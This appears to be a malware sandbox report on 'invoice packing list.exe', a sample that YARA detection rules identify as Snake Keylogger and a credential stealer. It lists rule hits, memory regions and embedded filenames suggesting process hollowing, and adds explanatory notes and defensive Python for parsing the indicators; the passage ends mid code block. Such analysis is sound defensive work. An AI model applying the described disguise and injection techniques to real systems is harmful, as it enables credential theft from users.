Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTR | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR | Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: initial sample | Static PE information: Filename: invoice packing list.exe
Source: C:\Users\user\Desktop\invoice packing list.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_02703E0C
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_02707390
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E271B8
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E27388
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E284C7
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E20040
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E2E127
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E2E138
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E209F0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E20A00
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 0_2_04E27379
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_01486108
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148C190
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148F007
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148B328
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148C470
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148C751
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_01486730
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_01489858
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148BBD2
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148CA31
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_01484AD9
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148BEB0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_01483570
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148E517
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148E528
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_0148B4F2
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC7EF6
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCBE00
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC9E78
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCB7B0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCA4C0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCC448
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCDD3A
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCAB10
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC9830
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC11A0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC91E0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC7910
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCB160
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC3600
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC9E67
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC67B0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC67A0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCB7A0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC47E8
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC47DA
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC7F58
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC74B8
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCA4B0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC74A8
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC0498
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC0488
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC54F0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC54E2
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCC438
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC4C30
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC6C08
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC4C40
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC5DA0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC5D92
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCBDF3
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC0D39
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC0D48
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC6220
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC6210
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC6BF8
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCAB02
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC4368
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC4358
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC5098
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC508A
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC08F0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC08E0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC9820
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC0006
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC7060
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC7054
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC0040
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC1191
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC91D0
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC2900
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC7900
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BCB150
Source: C:\Users\user\Desktop\invoice packing list.exe | Code function: 5_2_06BC5948
Source: invoice packing list.exe, 00000000.00000002.2039047487.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs invoice packing list.exe
Source: invoice packing list.exe, 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs invoice packing list.exe
Source: invoice packing list.exe, 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs invoice packing list.exe
Source: invoice packing list.exe, 00000000.00000002.2049167889.00000000052E0000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCaptive.dll" vs invoice packing list.exe
Source: invoice packing list.exe, 00000000.00000002.2039673818.0000000002620000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs invoice packing list.exe
Source: invoice packing list.exe, 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs invoice packing list.exe
Source: invoice packing list.exe, 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs invoice packing list.exe
Source: invoice packing list.exe, 00000000.00000000.2027180144.0000000000422000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameIhJW.exeF vs invoice packing list.exe
Source: invoice packing list.exe, 00000000.00000002.2040181674.00000000028B9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs invoice packing list.exe
Source: invoice packing list.exe, 00000005.00000002.4488887309.0000000000422000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs invoice packing list.exe
Source: invoice packing list.exe, 00000005.00000002.4489030628.0000000000DA7000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs invoice packing list.exe
Source: invoice packing list.exe | Binary or memory string: OriginalFilenameIhJW.exeF vs invoice packing list.exe
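Apart from clr.dll (the runtime itself), the OriginalFilename lines above carry five distinct embedded names: the on-disk file and the 0.0 image at 0x422000 report IhJW.exe, process 0's heap holds Montero.dll, Captive.dll and lfwhUWZlmFnGhDYPudAJ.exe, and the same 0x422000 image inside process 5 now reports lfwhUWZlmFnGhDYPudAJ.exe, which is consistent with the unpacked payload having been written over the child's image (see "Creates a process in suspended mode" in the signature list). The stray trailing character on each value (the F in IhJW.exeF, the X in ...exeX) is most likely noise from the sandbox's string extraction rather than part of the name. The Python below is an added example, not code from the report or from the sample: it carves OriginalFilename values out of a raw file or memory image by following the VS_VERSIONINFO String layout (NUL-terminated UTF-16LE key, at most one DWORD of padding, NUL-terminated UTF-16LE value) and lists the ones that disagree with the on-disk name. The sample image is constructed inside the block; the _vs_string helper exists only to build it.

```python
import struct

# UTF-16LE form of the VS_VERSIONINFO key we carve for.
KEY = "OriginalFilename".encode("utf-16-le")


def carve_original_filenames(blob: bytes) -> list:
    """Return every 'OriginalFilename' value found in a raw file or memory image.

    In a VS_VERSIONINFO String entry the key and the value are NUL-terminated
    UTF-16LE strings; the value follows the key's terminator plus, at most,
    one DWORD of alignment padding.
    """
    names = []
    pos = 0
    while (pos := blob.find(KEY, pos)) >= 0:
        cur = pos + len(KEY) + 2                      # skip key and its UTF-16 NUL
        skipped = 0
        while skipped < 2 and blob[cur:cur + 2] == b"\x00\x00":
            cur += 2                                  # alignment padding, if present
            skipped += 1
        end = cur
        while end + 1 < len(blob) and blob[end:end + 2] != b"\x00\x00":
            end += 2                                  # stop at the UTF-16 terminator
        value = blob[cur:end].decode("utf-16-le", errors="replace")
        if value and value.isprintable():
            names.append(value)
        pos = end
    return names


def mismatched_names(blob: bytes, on_disk_name: str) -> list:
    """Embedded names that differ (case-insensitively) from the name the file runs under."""
    return [n for n in carve_original_filenames(blob) if n.lower() != on_disk_name.lower()]


def _vs_string(key: str, value: str) -> bytes:
    """Build a minimal VS_VERSIONINFO String entry (wLength, wValueLength, wType=1, szKey, pad, szValue).

    Only used to construct the sample image below.
    """
    body = key.encode("utf-16-le") + b"\x00\x00"
    while (6 + len(body)) % 4:
        body += b"\x00"
    body += value.encode("utf-16-le") + b"\x00\x00"
    return struct.pack("<HHH", 6 + len(body), len(value) + 1, 1) + body


# Constructed sample image: three version-info entries separated by filler, imitating a
# process dump that holds the original executable plus two embedded assemblies.
SAMPLE_IMAGE = (
    b"\x00" * 16
    + _vs_string("OriginalFilename", "IhJW.exe")
    + b"MZ\x90\x00" + b"\x00" * 8
    + _vs_string("OriginalFilename", "Montero.dll")
    + _vs_string("InternalName", "Montero")
    + _vs_string("OriginalFilename", "invoice packing list.exe")
)

if __name__ == "__main__":
    print(carve_original_filenames(SAMPLE_IMAGE))
    print(mismatched_names(SAMPLE_IMAGE, "invoice packing list.exe"))
```

Run it over a full process dump (a .dmp from ProcDump or Task Manager) with the name the process was launched under; each mismatch is an assembly the process did not start as, which is exactly the signal the report's "vs invoice packing list.exe" lines encode.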
Source: invoice packing list.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.invoice packing list.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.invoice packing list.exe.4329568.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.invoice packing list.exe.3888088.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.invoice packing list.exe.3888088.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.invoice packing list.exe.4260d28.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.invoice packing list.exe.4329568.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.invoice packing list.exe.42c5148.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: invoice packing list.exe PID: 3008, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: invoice packing list.exe PID: 3716, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
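The two rule listings above (the short form ending in "Author: ...", and the long form carrying each rule's metadata) are the same hits printed twice, and on some lines the page extraction has run the region type and "Matched rule" together. The Python below is an added example, not part of the Joe Sandbox report or of any rule author's tooling: it parses both forms, recovers which analysed process each hit belongs to (the leading number of a .unpack or .sdmp source, or the PID of a "Process Memory Space" source), and tallies hits per rule so that matches in the loader's heap (process 0) can be told apart from matches in the child's rewritten image (process 5 at 0x400000) and from the string-only MEMORYSTR matches. The sample lines are copied from the report; the metadata key names are the rules' own.

```python
import re
from collections import defaultdict

# One report line: "Source: <where>, type: <UNPACKEDPE|MEMORY|MEMORYSTR> Matched rule: <name> <metadata>".
# The type and "Matched rule" are sometimes glued together by the page extraction, so the
# separator between them is optional.
LINE_RE = re.compile(
    r"^Source:\s*(?P<source>.+?),\s*type:\s*(?P<type>[A-Z]+?)\s*\|?\s*"
    r"Matched rule:\s*(?P<rule>\S+)\s*(?P<meta>.*)$"
)

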